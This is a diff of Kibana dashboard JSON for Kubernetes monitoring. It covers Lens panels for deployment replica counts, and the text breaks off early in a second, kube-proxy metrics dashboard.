"0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6": { + "columnOrder": [ + "7f1db361-8082-4f8d-985b-21e2a73c7073", + "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22" + ], + "columns": { + "7f1db361-8082-4f8d-985b-21e2a73c7073": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.deployment.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "78f09db9-67c3-40f1-93c7-9ba2b8ca8299", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6": { - "columnOrder": [ - "7f1db361-8082-4f8d-985b-21e2a73c7073", - "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22" - ], - "columns": { - "7f1db361-8082-4f8d-985b-21e2a73c7073": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.deployment.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - }, - "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.deployment.replicas.unavailable\": *" - }, - "isBucketed": false, - "label": "Replicas Unavailable ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.unavailable" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "78f09db9-67c3-40f1-93c7-9ba2b8ca8299", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "7f1db361-8082-4f8d-985b-21e2a73c7073", - "collapseFn": "sum", - "layerId": "0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", - "layerType": "data", - "metricAccessor": "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" }, - "title": "Deployment Replicas Unavailable [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.deployment.replicas.unavailable\": *" + }, + "isBucketed": false, + "label": "Replicas Unavailable ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.unavailable" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "934fbda9-c201-4539-bb6d-95c416b9d392", - "w": 12, - "x": 24, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "934fbda9-c201-4539-bb6d-95c416b9d392", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "78f09db9-67c3-40f1-93c7-9ba2b8ca8299", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "7f1db361-8082-4f8d-985b-21e2a73c7073", + "collapseFn": "sum", + "layerId": "0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", + "layerType": "data", + "metricAccessor": "f1c1c36b-5bdc-4755-bd47-e24fcfd58c22" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-006a132f-0e92-4aa2-818e-bc6aef899777", - "type": "index-pattern" + "title": "Deployment Replicas Unavailable [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "934fbda9-c201-4539-bb6d-95c416b9d392", + "w": 12, + "x": 24, + "y": 4 + }, + "panelIndex": "934fbda9-c201-4539-bb6d-95c416b9d392", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-006a132f-0e92-4aa2-818e-bc6aef899777", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ae122104-dfc0-48a6-b40c-94109bc57cbf", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "006a132f-0e92-4aa2-818e-bc6aef899777": { + "columnOrder": [ + "5136cbeb-0565-4aa8-afe0-c951c8454d1f", + "b3213d52-30f4-4255-b372-fe7d0d1a0919" + ], + "columns": { + "5136cbeb-0565-4aa8-afe0-c951c8454d1f": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.deployment.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "ae122104-dfc0-48a6-b40c-94109bc57cbf", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "006a132f-0e92-4aa2-818e-bc6aef899777": { - "columnOrder": [ - "5136cbeb-0565-4aa8-afe0-c951c8454d1f", - "b3213d52-30f4-4255-b372-fe7d0d1a0919" - ], - "columns": { - "5136cbeb-0565-4aa8-afe0-c951c8454d1f": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.deployment.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - }, - "b3213d52-30f4-4255-b372-fe7d0d1a0919": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.deployment.replicas.updated\": *" - }, - "isBucketed": false, - "label": "Replicas Updated", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.updated" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "ae122104-dfc0-48a6-b40c-94109bc57cbf", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "5136cbeb-0565-4aa8-afe0-c951c8454d1f", - "collapseFn": "sum", - "layerId": "006a132f-0e92-4aa2-818e-bc6aef899777", - "layerType": "data", - "metricAccessor": "b3213d52-30f4-4255-b372-fe7d0d1a0919" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" }, - "title": "Deployment Replicas Updated [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "b3213d52-30f4-4255-b372-fe7d0d1a0919": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.deployment.replicas.updated\": *" + }, + "isBucketed": false, + "label": "Replicas Updated", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.updated" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6", - "w": 12, - "x": 36, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "ae122104-dfc0-48a6-b40c-94109bc57cbf", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "5136cbeb-0565-4aa8-afe0-c951c8454d1f", + "collapseFn": "sum", + "layerId": "006a132f-0e92-4aa2-818e-bc6aef899777", + "layerType": "data", + "metricAccessor": "b3213d52-30f4-4255-b372-fe7d0d1a0919" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ce8436e0-8192-447a-b427-103026d8aa4b", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31": { - "columnOrder": [ - "28ea2553-630d-4917-b778-52da2d5bba86", - "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", - "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4", - "9b5ed643-7572-4d3b-a9af-6265b3a5a515" - ], - "columns": { - "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.deployment.replicas.unavailable: *" - }, - "isBucketed": false, - "label": "Replicas Unavailable", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.unavailable" - }, - "28ea2553-630d-4917-b778-52da2d5bba86": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Deployment Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - }, - "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.deployment.replicas.available: *" - }, - "isBucketed": false, - "label": "Replicas Available", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.available" - }, - "9b5ed643-7572-4d3b-a9af-6265b3a5a515": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Replicas Desired", - "operationType": "median", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.desired" - } - }, - "incompleteColumns": {} - } - } - } + "title": "Deployment Replicas Updated [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6", + "w": 12, + "x": 36, + "y": 4 + }, + "panelIndex": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ce8436e0-8192-447a-b427-103026d8aa4b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31": { + "columnOrder": [ + "28ea2553-630d-4917-b778-52da2d5bba86", + "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", + "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4", + "9b5ed643-7572-4d3b-a9af-6265b3a5a515" + ], + "columns": { + "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.deployment.replicas.unavailable: *" + }, + "isBucketed": false, + "label": "Replicas Unavailable", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.unavailable" + }, + "28ea2553-630d-4917-b778-52da2d5bba86": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Deployment Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "ce8436e0-8192-447a-b427-103026d8aa4b", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", - "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4", - "9b5ed643-7572-4d3b-a9af-6265b3a5a515" - ], - "layerId": "2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", - "layerType": "data", - "seriesType": "bar_stacked", - "xAccessor": "28ea2553-630d-4917-b778-52da2d5bba86", - "yConfig": [ - { - "color": "#f00e0e", - "forAccessor": "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4" - }, - { - "color": "#6092c0", - "forAccessor": "9b5ed643-7572-4d3b-a9af-6265b3a5a515" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 20 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" + }, + "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.deployment.replicas.available: *" + }, + "isBucketed": false, + "label": "Replicas Available", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.available" }, - "title": "Replicas per Deployment [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsXY" + "9b5ed643-7572-4d3b-a9af-6265b3a5a515": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Replicas Desired", + "operationType": "median", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.desired" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "ce8436e0-8192-447a-b427-103026d8aa4b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 17, - "i": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f", - "w": 48, - "x": 0, - "y": 11 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f", - "title": "Replicas per Deployment [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Deployments", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-31T12:44:00.635Z", - "id": "kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013", - "managed": false, - "references": [ - { - "id": "metrics-*", - "name": "c2551403-dc87-4486-bcac-0b949508082e:indexpattern-datasource-layer-f89abbc1-82fb-4d41-a11a-cf433264e823", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c2551403-dc87-4486-bcac-0b949508082e:611773bb-5ff9-4f08-ad80-de730b3bb8da", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "51e54a67-b167-49a2-95e6-e758a953a7e8:indexpattern-datasource-layer-0f3d63e6-e7d7-45d7-acc1-13be66847b70", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "51e54a67-b167-49a2-95e6-e758a953a7e8:899d30db-ab00-4a6f-9323-d4232f23735e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "934fbda9-c201-4539-bb6d-95c416b9d392:indexpattern-datasource-layer-0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "934fbda9-c201-4539-bb6d-95c416b9d392:78f09db9-67c3-40f1-93c7-9ba2b8ca8299", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6:indexpattern-datasource-layer-006a132f-0e92-4aa2-818e-bc6aef899777", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6:ae122104-dfc0-48a6-b40c-94109bc57cbf", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f:indexpattern-datasource-layer-2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f:ce8436e0-8192-447a-b427-103026d8aa4b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_01b10632-f741-4099-981d-f1008020884b:optionsListDataView", - "type": "index-pattern" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "77f5c6a8-9fb9-4bdd-bf9e-80fc5bd19625", + "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4", + "9b5ed643-7572-4d3b-a9af-6265b3a5a515" + ], + "layerId": "2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", + "layerType": "data", + "seriesType": "bar_stacked", + "xAccessor": "28ea2553-630d-4917-b778-52da2d5bba86", + "yConfig": [ + { + "color": "#f00e0e", + "forAccessor": "0bcf546f-2a52-48e7-8c4e-3a908be9d6c4" + }, + { + "color": "#6092c0", + "forAccessor": "9b5ed643-7572-4d3b-a9af-6265b3a5a515" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "Replicas per Deployment [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_e2a1ee45-5917-4945-a7fd-f4ee281b8d6d:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 17, + "i": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f", + "w": 48, + "x": 0, + "y": 11 }, - { - "id": "metrics-*", - "name": "controlGroup_9e437628-d460-4697-9427-616333ef6947:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f", + "title": "Replicas per Deployment [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Kubernetes] Deployments", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "c2551403-dc87-4486-bcac-0b949508082e:indexpattern-datasource-layer-f89abbc1-82fb-4d41-a11a-cf433264e823", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c2551403-dc87-4486-bcac-0b949508082e:611773bb-5ff9-4f08-ad80-de730b3bb8da", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "51e54a67-b167-49a2-95e6-e758a953a7e8:indexpattern-datasource-layer-0f3d63e6-e7d7-45d7-acc1-13be66847b70", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "51e54a67-b167-49a2-95e6-e758a953a7e8:899d30db-ab00-4a6f-9323-d4232f23735e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "934fbda9-c201-4539-bb6d-95c416b9d392:indexpattern-datasource-layer-0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "934fbda9-c201-4539-bb6d-95c416b9d392:78f09db9-67c3-40f1-93c7-9ba2b8ca8299", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6:indexpattern-datasource-layer-006a132f-0e92-4aa2-818e-bc6aef899777", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "20bd8473-2d2a-4d6c-84f7-20dbd9e724c6:ae122104-dfc0-48a6-b40c-94109bc57cbf", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f:indexpattern-datasource-layer-2ef0145f-ac0f-4dd6-9db2-6ea531a0bc31", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "119cd3f7-baa7-4a1d-8e02-a4ae95c98d1f:ce8436e0-8192-447a-b427-103026d8aa4b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_01b10632-f741-4099-981d-f1008020884b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_e2a1ee45-5917-4945-a7fd-f4ee281b8d6d:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_9e437628-d460-4697-9427-616333ef6947:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58.json b/packages/kubernetes/kibana/dashboard/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58.json index 369476df582..27e10234f6d 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58.json @@ -1,2514 +1,2533 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0OCwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"f53d0d21-4502-4dce-8004-017a92104040\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"host.name\",\"title\":\"Host\",\"id\":\"f53d0d21-4502-4dce-8004-017a92104040\",\"selectedOptions\":[],\"enhancements\":{},\"singleSelect\":false}},\"df56c430-83b1-436e-8b9c-fb027aaa29ca\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster\",\"singleSelect\":true,\"id\":\"df56c430-83b1-436e-8b9c-fb027aaa29ca\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Kubernetes Proxy metrics", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.proxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.proxy" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": true, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Kubernetes Proxy metrics", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ + "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Proxy\n\nThis dashboard collects data from [kube proxy](https://kubernetes.io/docs/concepts/overview/components/#kube-proxy) endpoint. Its purpose is to give an overview of what is happening inside it and detect problems that might be happening.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "w": 48, + "x": 0, + "y": 4 + }, + "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + 